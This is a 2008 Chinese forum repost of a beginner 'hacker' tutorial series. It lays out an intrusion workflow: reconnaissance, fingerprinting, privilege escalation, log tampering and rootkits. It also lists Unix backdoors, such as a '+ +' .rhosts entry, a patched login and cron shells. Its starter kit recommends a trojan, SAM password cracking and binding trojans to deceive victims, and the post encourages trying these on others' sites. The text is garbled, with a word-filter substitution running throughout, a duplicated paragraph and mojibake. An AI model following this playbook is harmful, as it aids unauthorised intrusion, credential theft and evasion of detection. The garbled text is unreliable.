[求助-软件问题]黑客进阶篇——全部认真的看完，不想成为高手都不行 [复制链接]

N多页慢慢看吧，菜鸟晋级之路。
基本技能...................................................................................2楼
黑客初级技术讲解（上）..........................................................3楼
黑客初级技术讲解（中）..........................................................4楼
黑客初级技术讲解（下）..........................................................5楼
基础知识（1）..........................................................................6楼
基础知识（2）..........................................................................7楼
基础知识（3）..........................................................................8楼
基础知识（4）..........................................................................9楼
黑客兵器之木马篇（上）........................................................10楼
黑客兵器之木马篇（下）..................................................... ...11楼
黑客兵器之扫描篇（上）.........................................................12楼
黑客兵器之扫描篇（下）.........................................................13楼
代理、肉鸡、跳板的概念.........................................................14楼
PHP近期漏洞更新....................................................................15楼
系统进程信息..........................................................................16楼
端口全解析（上）...................................................................17楼
端口全解析（下）...................................................................18楼
端口详细说明表（上）............................................................19楼
端口详细说明表（下）............................................................20楼
木马防范及一些端口的关闭................................................. ...21楼
SSL.TLS.WTLS原理（上）.....................................................22楼
SSL.TLS.WTLS原理（下）.....................................................23楼
关于MAC地址和IP地址的知识..................................................24楼
术语表（1）............................................................................25楼
术语表（5）............................................................................29楼
网络安全知识（1）...................................................................30楼
........................
网络安全知识（7）...............................................................31楼
防范非系统用户破坏..............................................................32楼
PING命令及使用技巧.............................................................33楼
GHOST详细解说（1）...........................................................34楼
GHOST详细解说（2）...........................................................35楼
GHOST详细解说（3）...........................................................36楼
ipc$详细解说大全（1）..........................................................37楼
..............................
ipc$详细解说大全（5）..........................................................42楼
常见ASP脚本攻击及防范技巧.................................................43楼
开启3389的5种方法（上）.....................................................44楼
开启3389的5种方法（下）.....................................................45楼
网络常见攻击及防范手册（上）..............................................46楼
网络常见攻击及防范手册（下）..............................................47楼
DOS攻击原理及方法介绍..........................................................48楼
如何突破各种防火墙..................................................................49楼
蠕虫技术（上）.........................................................................50楼
蠕虫技术（中）..........................................................................51楼
蠕虫技术（下）........................................................................ ..52楼
壳（上）.......................................................................................53楼
壳（下）.......................................................................................54楼
浅谈绑定之应用..............................................................................55楼
永远的后门.....................................................................................56楼
入门者如何获得肉鸡.......................................................................57楼
NET START可以起用命令一览表.....................................................58楼

PS：本文由＂紫月轩＂发于黑客基地，在此表示感谢，全部转完了，虽说不是原创，但也累的不行哦!觉得好的就顶我一个吧!呵呵，谢谢!

[ 本帖最后由 胡可 于 2008-6-14 22:53 编辑 ]

网络安全从其本质上来讲就是网络上的信息安全。从广义来说，凡是涉及到网络上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。确保网络系统的信息安全是网络安全的目标，信息安全包括两个方面：信息的存储安全和信息的传输安全。信息的存储安全是指信息在静态存放状态下的安全，如是否会被非授权调用等。信息的传输安全是指信息在动态传输过程中安全。为了确保网络信息的传输安全，有以下几个问题：

　　（１）对网络上信息的监听
　　（２）对用户身份的仿冒
　　（３）对网络上信息的篡改
　　（４）对发出的信息予以否认
　　（５）对信息进行重发

　　对于一般的常用入侵方法主要有

　　1.口令入侵

　　所谓口令入侵，就是指用一些软件解开已经得到但被人加密的口令文档，不过许多黑客已大量采用一种可以绕开或屏蔽口令保护的程序来完成这项工作。对于那些可以解开或屏蔽口令保护的程序通常被称为“Crack”。由于这些软件的广为流传，使得入侵电脑网络系统有时变得相当简单，一般不需要很深入了解系统的内部结构，是初学者的好方法。

　　2.特洛伊木马术

　　说到特洛伊木马，只要知道这个故事的人就不难理解，它最典型的做法可能就是把一个能帮助黑客完成某一特定动作的程序依附在某一合法用户的正常程序中，这时合法用户的程序代码已被该变。一旦用户触发该程序，那么依附在内的黑客指令代码同时被激活，这些代码往往能完成黑客指定的任务。由于这种入侵法需要黑客有很好的编程经验，且要更改代码、要一定的权限，所以较难掌握。但正因为它的复杂性，一般的系统管理员很难发现。

　　3.监听法

　　这是一个很实用但风险也很大的黑客入侵方法，但还是有很多入侵系统的黑客采用此类方法，正所谓艺高人胆大。

　　网络节点或工作站之间的交流是通过信息流的转送得以实现，而当在一个没有集线器的网络中，数据的传输并没有指明特定的方向，这时每一个网络节点或工作站都是一个接口。这就好比某一节点说：“嗨！你们中有谁是我要发信息的工作站。”

　　此时，所有的系统接口都收到了这个信息，一旦某个工作站说：“嗨！那是我，请把数据传过来。”联接就马上完成。

　　目前有网络上流传着很多嗅探软件，利用这些软件就可以很简单的监听到数据，甚至就包含口令文件，有的服务在传输文件中直接使用明文传输，这也是非常危险的
4.E-mail技术

　　使用email加木马程序这是黑客经常使用的一种手段，而且非常奏效，一般的用户，甚至是网管，对网络安全的意识太过于淡薄，这就给很多黑客以可乘之机。

　　5.病毒技术
　　作为一个黑客，如此使用应该是一件可耻的事情，不过大家可以学习，毕竟也是一种攻击的办法，特殊时间，特殊地点完全可以使用。

　　6.隐藏技术

　　网络攻击的一般步骤及实例

　　攻击的准备阶段

　　首先需要说明的是，入侵者的来源有两种，一种是内部人员利用自己的工作机会和权限来获取不应该获取的权限而进行的攻击。另一种是外部人员入侵，包括远程入侵、网络节点接入入侵等。本节主要讨论远程攻击。

　　进行网络攻击是一件系统性很强的工作，其主要工作流程是：收集情报，远程攻击，远程登录，取得普通用户的权限，取得超级用户的权限，留下后门，清除日志。主要内容包括目标分析，文档获取，破解密码，日志清除等技术，下面分别介绍。

　　1.确定攻击的目的

　　攻击者在进行一次完整的攻击之前首先要确定攻击要达到什么样的目的，即给对方造成什么样的后果。常见的攻击目的有破坏型和入侵型两种。破坏型攻击指的只是破坏攻击目标，使其不能正常工作，而不能随意控制目标的系统的运行。要达到破坏型攻击的目的，主要的手段是拒绝服务攻击（Denial Of Service）。另一类常见的攻击目的是入侵攻击目标，这种攻击是要获得一定的权限来达到控制攻击目标的目的。应该说这种攻击比破坏型攻击更为普遍，威胁性也更大。因为黑客一旦获取攻击目标的管理员权限就可以对此服务器做任意动作，包括破坏性的攻击。此类攻击一般也是利用服务器想跳楼作系统、应用软件或者网络协议存在的漏洞进行的。当然还有另一种造成此种攻击的原因就是密码泄露，攻击者靠猜测或者穷举法来得到服务器用户的密码，然后就可以用和真正的管理员一样对服务器进行访问。

　　2.信息收集

　　除了确定攻击目的之外，攻击前的最主要工作就是收集尽量多的关于攻击目标的信息。这些信息主要包括目标的想跳楼作系统类型及版本，目标提供哪些服务，各服务器程序的类型与版本以及相关的社会信息。

　　要攻击一台机器，首先要确定它上面正在运行的想跳楼作系统是什么，因为对于不同类型的想跳楼作系统，其上的系统漏洞有很大区别，所以攻击的方法也完全不同，甚至同一种想跳楼作系统的不同版本的系统漏洞也是不一样的。要确定一台服务器的想跳楼作系统一般是靠经验，有些服务器的某些服务显示信息会泄露其想跳楼作系统。例如当我们通过TELNET连上一台机器时，如果显示

　　Unix（r）System V Release 4．0
　　login：

　　那么根据经验就可以确定这个机器上运行的想跳楼作系统为SUN OS 5．5或5．5．l。但这样确定想跳楼作系统类型是不准确的，因为有些网站管理员为了迷惑攻击者会故意更改显示信息，造成假象。
还有一种不是很有效的方法，诸如查询DNS的主机信息（不是很可靠）来看登记域名时的申请机器类型和想跳楼作系统类型，或者使用社会工程学的方法来获得，以及利用某些主机开放的SNMP的公共组来查询。

　　另外一种相对比较准确的方法是利用网络想跳楼作系统里的TCP/IP堆栈作为特殊的“指纹”来确定系统的真正身份。因为不同的想跳楼作系统在网络底层协议的各种实现细节上略有不同。可以通过远程向目标发送特殊的包，然后通过返回的包来确定想跳楼作系统类型。例如通过向目标机发送一个FIN的包（或者是任何没有ACK或SYN标记的包）到目标主机的一个开放的端口然后等待回应。许多系统如windows、 BSDI、 CISCO、 HP／UX和 IRIX会返回一个RESET。通过发送一个SYN包，它含有没有定义的TCP标记的TCP头。那么在Linux系统的回应包就会包含这个没有定义的标记，而在一些别的系统则会在收到SYN+BOGU包之后关闭连接。或是利用寻找初始化序列长度模板与特定的想跳楼作系统相匹配的方法。利用它可以对许多系统分类，如较早的Unix系统是64K长度，一些新的Unix系统的长度则是随机增长。还有就是检查返回包里包含的窗口长度，这项技术根据各个想跳楼作系统的不同的初始化窗口大小来唯一确定它们。利用这种技术实现的工具很多，比较著名的有NMAP、CHECKOS、QUESO等。

　　获知目标提供哪些服务及各服务daemon的类型、版本同样非常重要，因为已知的漏洞一般都是对某一服务的。这里说的提供服务就是指通常我们提到的喘口，例如一般TELNET在23端口，FTP在对21端口，WWW在80端口或8080端口，这只是一般情况，网站管理完全可以按自己的意愿修改服务所监听的端口号。在不同服务器上提供同一种服务的软件也可以是不同，我们管这种软件叫做daemon，例如同样是提供FTP服务，可以使用wuftp、 proftp，ncftp等许多不同种类的daemon。确定daemon的类型版本也有助于黑客利用系统漏洞攻破网站。

　　另外需要获得的关于系统的信息就是一些与计算机本身没有关系的社会信息，例如网站所属公司的名称、规模，网络管理员的生活习惯、电话号码等。这些信息看起来与攻击一个网站没有关系，实际上很多黑客都是利用了这类信息攻破网站的。例如有些网站管理员用自己的电话号码做系统密码，如果掌握了该电话号码，就等于掌握了管理员权限进行信息收集可以用手工进行，也可以利用工具来完成，完成信息收集的工具叫做扫描器。用扫描器收集信息的优点是速度快，可以一次对多个目标进行扫描。

　　攻击的实施阶段

　　1.获得权限

　　当收集到足够的信息之后，攻击者就要开始实施攻击行动了。作为破坏性攻击，只需利用工具发动攻击即可。而作为入侵性攻击，往往要利用收集到的信息，找到其系统漏洞，然后利用该漏洞获取一定的权限。有时获得了一般用户的权限就足以达到修改主页等目的了，但作为一次完整的攻击是要获得系统最高权限的，这不仅是为了达到一定的目的，更重要的是证明攻击者的能力，这也符合黑客的追求。

　　能够被攻击者所利用的漏洞不仅包括系统软件设计上的安全漏洞，也包括由于管理配置不当而造成的漏洞。前不久，因特网上应用最普及的著名www服务器提供商Apache的主页被黑客攻破，其主页面上的 Powered by Apache图样（羽*状的图画）被改成了Powered by　Microsoft Backoffice的图样，那个攻击者就是利用了管理员对Webserver用数据库的一些不当配置而成功取得最高权限的。

黑客初级技术讲解（上）
１、黑客的精神态度是很重要的，但技术则更是重要。黑客的态度虽然是无可取代，随著新科技的发明和旧技术的取代,这些工具随时间在慢慢的改变。例如:以往总是会学会用机器码写程序，直到最近我们开始使用HTML。不过，在1996年末,当然，这是基础的hacking技能。在1997年，理所当然的，你必须学会C。但,如果你只是学一种语言，那么你不能算是一位黑客，了不起只能算是一个programmer。除此,你还必须学会学会以独立于任何程序语言之上的概括性观念来思考一件程序设计上的问题。要成为一位真正的黑客，你必须要能在几天之内将manual内容和你目前己经知道的关连起学会一种新的语言。也就是说，你必会学还了C之外的东西，你至少还要会LISP或Perl(Java也正在努力的挤上这个名单; 译者注: 我很怀疑这份名单)。除了几个重要的hacking常用语言之外，这些语言提供你一些不同的程序设计途径，并且让你在好的方法中学习。

程序设计是一种复杂的技术，我没辨法在这提供完整的学习步骤。但是我能告诉你一些在书本上和课堂上所没有的东西(有很多，几乎全部最好的黑客们都是自习而来的)。(a) 读别人的程序码；(写程序，这两项是不错的方法。学习写程序就像在学习写一种良好的自然语言，最好的方法是去看一些专家们所写的东西，然后写一些你自己的东西，然后读更多，再写更多。然后一直持续，一直到你发展出一种属于自己的风格和特色。要找到好的程序码来看是很一件很困难的事，因为，对菜鸟黑客们而言，适于供他们阅读和努力的大型程序的source数量很少。但这事己有了戏剧性的变化了; 现在免费的供应的软件、程序设计工具和想跳楼作系统(大都公开提供 source，而且全都是由黑客们写成的)到处可看。进入下一个主题。

２、取得一个免费的 UNIX，并学习使用和维护。我先假设你己经有一部个人电脑或者是可以使用任何一部(现在的小孩子真幸福，可如此轻易的拥有 :-))。 取得黑客技巧的第一个步骤是取得一份Linux 或者一份免费的 BSD-Unix，并将它安装在自己的机器，并使之顺利的运作。没错，在这个世界上除了Unix之外，还有其它的想跳楼作系统。但是他们只提供 bianry，你不能看到他们的程序码，你也不能修改他们。想要在DOS或Windows或MacOS开始hacking，无疑就是要你绑著枷锁跳舞一样。

除此之外，Unix是Internet上的想跳楼作系统。当你在不懂Unix的情况下学习使用Internet时，你没辨法在不懂Unix的情况下成为 Internet的黑客。因为这个原故，现在的黑客文化还是很牢固的以Unix为中心。(这并不完全是正确的，而且有些活在旧时代的黑客甚至也不喜欢这种情形，但是Unix和Internet之间的共生共成己经到了牢不可破的地步，即使是Microsoft的大块肌肉也没能在上面留下明显的伤痕。) 因些，把Unix装起来吧! (我自己是喜欢Linux，但是还有其它的东东可用。) 学习它，让它运作起来，让它陪你努力精进。用他向整个Internet喊话。看程序码，改程序。

有一天你成为一位高竿的黑客，你回头往后看时会发现，你得到比Microsoft想跳楼作系统所能提供的还要好的程序设计工具(包括 C，Lisp和 Perl)。而且得到快乐，并学到比共生共成己经到了牢不可破的地步，即使是Microsoft的大块肌肉也没能在上面留下明显的伤痕。) 因些，把Unix装起来吧! (我自己是喜欢Linux，但是还有其它的东东可用。) 学习它，让它运作起来，让它陪你努力精进。用他向整个Internet喊话。看程序码，改程序。有一天你成为一位高竿的黑客，你回头往后看时会发现，你得到比Microsoft想跳楼作系统所能提供的还要好的程序设计工具(包括 C，Lisp和 Perl)。而且得到快乐，并
学到比你想像中的还要多的知识。关于学习Unix，在Loginataka有更多的资料。(http://www.ccil.org/~esr/faqs/loginataka。)
看一下Linux distribution的目录或 Linux CD，并把自己交付给它。

3、学习使用World Wide Web并学会写 HTML。
在黑客文化创造出来的东西，大多在他们的活动范围外被使用著，如,在工厂和辨公室或大学被漠漠的使用著。但Web是一个很大的例外，这个黑客眼中的大玩具甚至还被政客们接受，并巧巧的在改变这个世界。因此(还有很多好的理由)，你必须学习Web。并不只是学习使用browser(这太容易了)而己，还要学会写HTML这个Web的标签语言。如果你不知道如何设计程序，写HTML也可以给一些习惯上的帮助。嗯!! 建立home page吧! 不过，有一个home page 并没任何特别之处能让你成为一位黑客。Web上到处都是home page，而且大部份都没什么重点，没什么内容的烂泥 -- 很好看的烂泥巴，但是看起来都一样，差不多。

4、至少学会以下的其中两种：
一、网站服务器程序ASP、PHP、CGI、jsP
我个人认为CGI是最难学的其中一种。
二、程序语言：C语言、C++、VB、JAVA、PERL、DELPHI、汇编语言
不过我认为C语言的通用性最好，可以跨平台（想跳楼作系统）使用。
还要试着自己写程序、开发软件等工作。
三、数据库管理软件：MYSQL、SQL、FOXPRO……等。
四、几种常用的想跳楼作系统：WIN98、WIN2000、WINNT、WINXP、UNIX、LINUX、要是能学到UNIX那是最好不过的了。最最基本的WIN2K、WINNT也要学会吧。
如果以上的你都会了，那么你已经是个高手了

黑客初级技术讲解（中）

　当然大多数攻击成功的范例还是利用了系统软件本身的漏洞。造成软件漏洞的主要原因在于编制该软件的程序员缺乏安全意识。当攻击者对软件进行非正常的调用请求时造成缓冲区溢出或者对文件的非法访问。其中利用缓冲区溢出进行的攻击最为普遍，据统计80％以上成功的攻击都是利用了缓冲区溢出漏洞来获得非法权限的。关于缓冲区溢出在后面用专门章节来作详细解释。

　　无论作为一个黑客还是一个网络管理员，都需要掌握尽量多的系统漏洞。黑客需要用它来完成攻击，而管理员需要根据不同的漏洞来进行不同的防御措施。了解最新最多的漏洞信息，可以到诸如Rootshell（www.rootshell．com）、Packetstorm（packetstorm． securify．com）、Securityfocus（www.securityfocus．com）等网站去查找。

　　2.权限的扩大

　　系统漏洞分为远程漏洞和本地漏洞两种，远程漏洞是指黑客可以在别的机器上直接利用该漏洞进行攻击并获取一定的权限。这种漏洞的威胁性相当大，黑客的攻击一般都是从远程漏洞开始的。但是利用远程漏洞获取的不一定是最高权限，而往往只是一个普通用户的权限，这样常常没有办法做黑客们想要做的事。这时就需要配合本地漏洞来把获得的权限进行扩大，常常是扩大至系统的管理员权限。
只有获得了最高的管理员权限之后，才可以做诸如网络监听、打扫痕迹之类的事情。要完成权限的扩大，不但可以利用已获得的权限在系统上执行利用本地漏洞的程序，还可以放一些木马之类的欺骗程序来套取管理员密码，这种木马是放在本地套取最高权限用的，而不能进行远程控制。例如一个黑客已经在一台机器上获得了一个普通用户的账号和登录权限，那么他就可以在这台机器上放置一个假的su程序。一旦黑客放置了假su程序，当真正的合法用户登录时，运行了su，并输入了密码，这时root密码就会被记录下来，下次黑客再登录时就可以使用su变成root了。

　　攻击的善后工作

　　1.日志系统简介

　　如果攻击者完成攻击后就立刻离开系统而不做任何善后工作，那么他的行踪将很快被系统管理员发现，因为所有的网络想跳楼作系统一般都提供日志记录功能，会把系统上发生的动作记录下来。所以，为了自身的隐蔽性，黑客一般都会抹掉自己在日志中留下的痕迹。想要了解黑客抹掉痕迹的方法，首先要了解常见的想跳楼作系统的日志结构以及工作方式。Unix的日志文件通常放在下面这几个位置，根据想跳楼作系统的不同略有变化

　　／usr／adm——早期版本的Unix。
　　／Var／adm新一点的版本使用这个位置。
　　／Varflort一些版本的Solaris、 Linux BSD、 Free BSD使用这个位置。
　　／etc，大多数Unix版本把Utmp放在此处，一些Unix版本也把Wtmp放在这里，这也是Syslog．conf的位置。

　　下面的文件可能会根据你所在的目录不同而不同：

　　acct或pacct－一记录每个用户使用的命令记录。
　　accesslog主要用来服务器运行了NCSA HTTP服务器，这个记录文件会记录有什么站点连接过你的服务器。
　　aculo保存拨出去的Modems记录。
　　lastlog记录了最近的Login记录和每个用户的最初目的地，有时是最后不成功Login的记录。
　　loginlog一记录一些不正常的L0gin记录。
　　messages——记录输出到系统控制台的记录，另外的信息由Syslog来生成
　　security记录一些使用 UUCP系统企图进入限制范围的事例。
　　sulog记录使用su命令的记录。
　　utmp记录当前登录到系统中的所有用户，这个文件伴随着用户进入和离开系统而不断变化。
　　Utmpx，utmp的扩展。
　　wtmp记录用户登录和退出事件。
　　Syslog最重要的日志文件，使用syslogd守护程序来获得。

　　2.隐藏踪迹

　　攻击者在获得系统最高管理员权限之后就可以随意修改系统上的文件了（只对常规 Unix系统而言），包括日志文件，所以一般黑客想要隐藏自己的踪迹的话，就会对日志进行修改。最简单的方法当然就是删除日志文件了，但这样做虽然避免了系统管理员根据IP追踪到自己，但也明确无误地告诉了管理员，系统己经被人侵了。所以最常用的办法是只对日志文件中有关自己的那一部分做修改。关于修改方法的具体细节根据不同的想跳楼作系统有所区别，网络上有许多此类功能的程序，例如 zap、 wipe等，其主要做法就是清除 utmp、wtmp、Lastlog和 Pacct等日志文件中某一用户的信息，使得当使用w、who、last等命令查看日志文件时，隐藏掉此用户的信息。
管理员想要避免日志系统被黑客修改，应该采取一定的措施，例如用打印机实时记录网络日志信息。但这样做也有弊端，黑客一旦了解到你的做法就会不停地向日志里写入无用的信息，使得打印机不停地打印日志，直到所有的纸用光为止。所以比较好的避免日志被修改的办法是把所有日志文件发送到一台比较安全的主机上，即使用loghost。即使是这样也不能完全避免日志被修改的可能性，因为黑客既然能攻入这台主机，也很可能攻入loghost。

　　只修改日志是不够的，因为百密必有一漏，即使自认为修改了所有的日志，仍然会留下一些蛛丝马迹的。例如安装了某些后门程序，运行后也可能被管理员发现。所以，黑客高手可以通过替换一些系统程序的方法来进一步隐藏踪迹。这种用来替换正常系统程序的黑客程序叫做rootkit，这类程序在一些黑客网站可以找到，比较常见的有LinuxRootKit，现在已经发展到了5.0版本了。它可以替换系统的ls、ps、netstat、inetd等等一系列重要的系统程序，当替换了ls后，就可以隐藏指定的文件，使得管理员在使用ls命令时无法看到这些文件，从而达到隐藏自己的目的。

　　3.后门

　　 一般黑客都会在攻入系统后不只一次地进入该系统。为了下次再进入系统时方便一点，黑客会留下一个后门，特洛伊木马就是后门的最好范例。Unix中留后门的方法有很多种，下面介绍几种常见的后门，供网络管理员参考防范。

　　<1>密码破解后门
　　这是入侵者使用的最早也是最老的方法，它不仅可以获得对Unix机器的访问，而且可以通过破解密码制造后门。这就是破解口令薄弱的帐号。以后即使管理员封了入侵者的当前帐号，这些新的帐号仍然可能是重新侵入的后门。多数情况下，入侵者寻找口令薄弱的未使用帐号，然后将口令改的难些。当管理员寻找口令薄弱的帐号是，也不会发现这些密码已修改的帐号。因而管理员很难确定查封哪个帐号。

　　<2>Rhosts + + 后门
　　在连网的Unix机器中，象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简单的认证方法。用户可以轻易的改变设置而不需口令就能进入。 入侵者只要向可以访问的某用户的rhosts文件中输入"+ +"，就可以允许任何人从任何地方无须口令便能进 入这个帐号。特别当home目录通过NFS向外共享时，入侵者更热中于此。这些帐号也成了入侵者再次侵入的后门。许多人更喜欢使用Rsh，因为它通常缺少日志能力. 许多管理员经常检查 "+ +"，所以入侵者实际上多设置来自网上的另一个帐号的主机名和 用户名，从而不易被发现。

　　<3>校验和及时间戳后门
　　早期，许多入侵者用自己的trojan程序替代二进制文件。系统管理员便依靠时间戳和系统校验和的程序辨别一个二进制文件是否已被改变，如Unix里的sum程序。入侵者又发展了使trojan文件和原文件时间戳同步的新技术。它是这样实现的: 先将系统时钟拨 回到原文件时间，然后调整trojan文件的时间为系统时间。一旦二进制trojan文件与原来的精确同步，就可以把系统时间设回当前时间。Sum程序是基于CRC校验，很容易骗过。入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序。MD5是被 大多数人推荐的，MD5使用的算法目前还没人能骗过。

<4>Login后门
　　在Unix里，login程序通常用来对telnet来的用户进行口令验证. 入侵者获取login.c的原代码并修改，使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门口令，它将忽视管理员设置的口令让你长驱直入。这将允许入侵者进入任何帐号，甚至是root。由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问的，所以入侵者可以登录获取shell却不会暴露该帐号。管理员注意到这种后门后，便 用"strings"命令搜索login程序以寻找文本信息. 许多情况下后门口令会原形毕露。入侵者就开始加密或者更好的隐藏口令，使strings命令失效<5>Telnetd后门
　　当用户telnet到系统，监听端口的inetd服务接受连接随后递给in.telnetd，由它运行 login.一些入侵者知道管理员会检查login是否被修改，就着手修改in.telnetd. 在in.telnetd内部有一些对用户信息的检验，比如用户使用了何种终端. 典型的终端设置是Xterm或者VT100.入侵者可以做这样的后门，当终端设置为"letmein"时产生一 个不要任何验证的shell. 入侵者已对某些服务作了后门，对来自特定源端口的连接产 生一个shell。

　　<6>服务后门
　　几乎所有网络服务曾被入侵者作过后门. Finger，rsh，rexec，rlogin，ftp，甚至 inetd等等的作了的版本随处多是。有的只是连接到某个TCP端口的shell，通过后门口令就能获取访问。这些程序有时用刺娲□？Ucp这样不用的服务，或者被加入inetd.conf 作为一个新的服务，管理员应该非常注意那些服务正在运行，并用MD5对原服务程序做校验。

　　<7>Cronjob后门
　　Unix上的Cronjob可以按时间表调度特定程序的运行。入侵者可以加入后门shell程序 使它在1AM到2AM之间运行，那么每晚有一个小时可以获得访问。也可以查看cronjob中 经常运行的合法程序，同时置入后门。

　　<8>库后门
　　几乎所有的UNIX系统使用共享库，共享库用于相同函数的重用而减少代码长度。一些入侵者在象crypt.c和_crypt.c这些函数里作了后门；象login.c这样的程序调用了 crypt()。当使用后门口令时产生一个shell。因此，即使管理员用MD5检查login程序，仍然能产生一个后门函数，而且许多管理员并不会检查库是否被做了后门。对于许多入侵者来说有一个问题: 一些管理员对所有东西多作了MD5校验，有一种办法是入侵者对open()和文件访问函数做后门。后门函数读原文件但执行trojan后门程序。所以当MD5读这些文件时，校验和一切正常，但当系统运行时将执行trojan版本的，即使trojan库本身也可躲过MD5校验，对于管理员来说有一种方法可以找到后门，就是静态编连MD5校验程序然后运行，静态连接程序不会使用trojan共享库。

　　<9>内核后门
　　内核是Unix工作的核心，用于库躲过MD5校验的方法同样适用于内核级别，甚至连静态 连接多不能识别. 一个后门作的很好的内核是最难被管理员查找的，所幸的是内核的 后门程序还不是随手可得，每人知道它事实上传播有多广。

　<10>文件系统后门
　　入侵者需要在服务器上存储他们的掠夺品或数据，并不能被管理员发现，入侵者的文章常是包括exploit脚本工具，后门集，sniffer日志， email的备分，原代码，等等！有时为了防止管理员发现这么大的文件，入侵者需要修补"ls"，"du"，"fsck"以隐匿特定的目录和文件，在很低的级别，入侵者做这样的漏洞: 以专有的格式在硬盘上割出一部分，且表示为坏的扇区。因此入侵者只能用特别的工具访问这些隐藏的文件，对于普通的管理员来说，很难发现这些"坏扇区"里的文件系统，而它又确实存在。

　　<11>Boot块后门
　　在PC世界里，许多病毒藏匿与根区，而杀病毒软件就是检查根区是否被改变。Unix下，多数管理员没有检查根区的软件，所以一些入侵者将一些后门留在根区。
. 所以更多的管理员是 用MD5校验和检测这种后门的。
<12>隐匿进程后门
　　入侵者通常想隐匿他们运行的程序，这样的程序一般是口令破解程序和监听程序 (sniffer)，有许多办法可以实现，这里是较通用的: 编写程序时修改自己的argv[] 使它看起来象其他进程名。可以将sniffer程序改名类似in.syslog再执行，因此当管理员用"ps"检查运行进程时，出现 的是标准服务名。可以修改库函数致使 "ps"不能显示所有进程，可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现。　　<14>TCP Shell 后门
　　入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下，他们用口令进行保护以免管理员连接上后立即看到是shell访问. 管理员可以用netstat 命令查看当前的连接状态，那些端口在侦听，目前连接的来龙去脉. 通常这些后门可 以让入侵者躲过TCP Wrapper技术. 这些后门可以放在SMTP端口，许多防火墙允许 e-mail通行的.

　　<15>UDP Shell 后门
　　管理员经常注意TCP连接并观察其怪异情况，而UDP Shell后门没有这样的连接，所以 netstat不能显示入侵者的访问痕迹，许多防火墙设置成允许类似DNS的UDP报文的通行，通常入侵者将UDP Shell放置在这个端口，允许穿越防火墙。

　　<16>ICMP Shell 后门
　　Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一。许多防火墙允许外界ping它内部的机器，入侵者可以放数据入Ping的 ICMP包，在ping的机器间形成一个shell通道，管理员也许会注意到Ping包暴风，但除了他查看包内数据，否者入侵者不会暴露。

　　<17>加密连接
　　管理员可能建立一个sniffer试图某个访问的数据，但当入侵者给网络通行后门加密 后，就不可能被判定两台机器间的传输内容了。

基础知识（1）

我认为这是一套适合初学者由浅到深的文章，所以强烈推荐给大家，作者从基础讲到最近比较火的漏洞，可能有些人看来是浅了些，但是的确很适合想干点啥但又不知道怎么办的菜鸟们 。

第一节，伸展运动。这节想跳楼我们要准备道具，俗话说：“工欲善其事，必先利其器”（是这样吗？哎！文化低……）说得有道理，我们要学习黑客技术，一点必要的工具必不可少。

1，一台属于自己的可以上网的电脑。这样你可以有充分的支配权，上网不用说，否则你怎么看到我的文章？wap?呵呵！属于自己很重要，否则安全性是个很大的问题。第一点相信大家没有问题。

2，windows2000/nt,别和我说98/me,他们是你们同学用来玩游戏的！（当然，我也是铁杆game fan)对网络支持极差，命令受限制，很多软件又不能用，对黑客来说使用起来绊手绊脚，非常不利。这里我推荐2000，这是一个很成熟的系统（漏洞还是有一堆）。推荐双系统，这样黑玩搭配，干活不累。

3，冰河。中国第一木马，中者数不胜数，国人骄傲。虽然用冰河根本不能算黑客，但它确实能培养你对黑客的兴趣，同时帮助你了解网络，相信很多黑客同学都是这样起步的。静止写的那篇冰河教程很不错，大家仔细看看。而且，以后你学会入侵服务器后，用冰河想跳楼作也会减少工作量（我是懒虫，爽！）

4，oicq。我们学黑客，可不是学泡mm!bfctx你………… 息怒息怒！我们当然是学黑客，但不要忘了，众人拾柴火更高，我们通过cshu的成员列表，互相联系帮助，对提高水平很有帮助！另外我要废话一句：据我了解，现在黑客网站下载最多的都是针对oicq的破解工具，我个人认为很无聊，偷个密码代表什么，浪费时间！最后补充：mm不能不泡。（谁砸我？？！！）

5，superscan。很好用的端口扫描器，速度超快，功能一流，一旦拥有，别无所求……（打住！）不论是找木马受害者，还是扫服务器端口，它都非常有效，cshu强烈推荐！

6，一本笔记本/便条，网上资料相当多，黑客处理的也是非常之多。良好的习惯决定了你的效率，准备一本笔记本，记录下你的成果，肉鸡，木马利用，命令，密码……坚持一下，你会发现你的效率大幅上升的！

7，lc3.著名nt/2000sam破解程序，有时我们拿不到足够权限，又没好办法，那么lc3是最好的解决办法，只要你拿的到sam，你就是服务器它爷爷！本站有其破解程序，支持了暴力破解！

8，程序合并。这是玩木马必需的，虽然木马是很低的手段，但有时配合巧办法（以后我会介绍）确实能够达到意想不到的效果，朋友们可以在空闲时玩玩木马，很有趣，若你能巧妙的骗过mm,那么webmaster也可能被你骗倒：〉 （比较理想化）

9，流光4for 2000/nt。可能是世界上最好的综合类黑软！中国的骄傲，它集成了很全的漏洞信息，速度快，方法多，对有漏洞的主机是毁灭性的打击，想跳楼作又方便，是快速黑站必不可少的精品工具。超级吐血推荐！！

10，良好的心态，稳定的情绪，刻苦钻研的精神，刨根问底的作风，打扫房间的习惯。黑客是门很高深的学问，不要幻想一步登天，失败是常有的事，千万不可灰心。在那么多黑软的包围下，切不可完全依赖他们，一定要了解它们利用什么原理工作。对任何一个小问题，小细节，一定要问清楚，cshu就是给大家互相交流的场所哦！黑完后不要得意忘形，打扫战场也很重要，以防万一。

第一节想跳楼完，可能很无聊，我就这点水平，大家见谅！这里我说一句大话：做完菜鸟想跳楼，包你会黑简单的站（哎哟！心慌了！）

下一节想跳楼我们要介绍如何掌握一台主机的基本信息，期待中……

真是太对不起大家了，隔了那么久才写这篇教程，我这几天实在太忙，大家还是体谅一下我吧，好了，开始做想跳楼。

今天的内容是获得主机的信息。 我们要黑一台主机，首先要了解它的信息，包括它的类型，用户列表，目录，端口，漏洞等等。

首先我们我们要找一台主机来练手，随便挑吧！www.flyingfish.com(乱说的)

第一部，呵呵，先在ie里看看吧，mmmm.....做的还行，挺精致的！主要是我们肯定了它现在是正常的。 然后，我们应该知道它的ip,很简单，ping它一下就可以了。

ping www.flyingfish.com，看看窗口里有了什么？是不是有三行回应，其中的111.111.222.222就是ip了（还是胡说的，一个例子）。有人是不是要问，我这里怎么没有。那可能是两个原因，第一，你打错命令了；第二，该主机装了防火墙，禁止ping,不过这种可能很小。

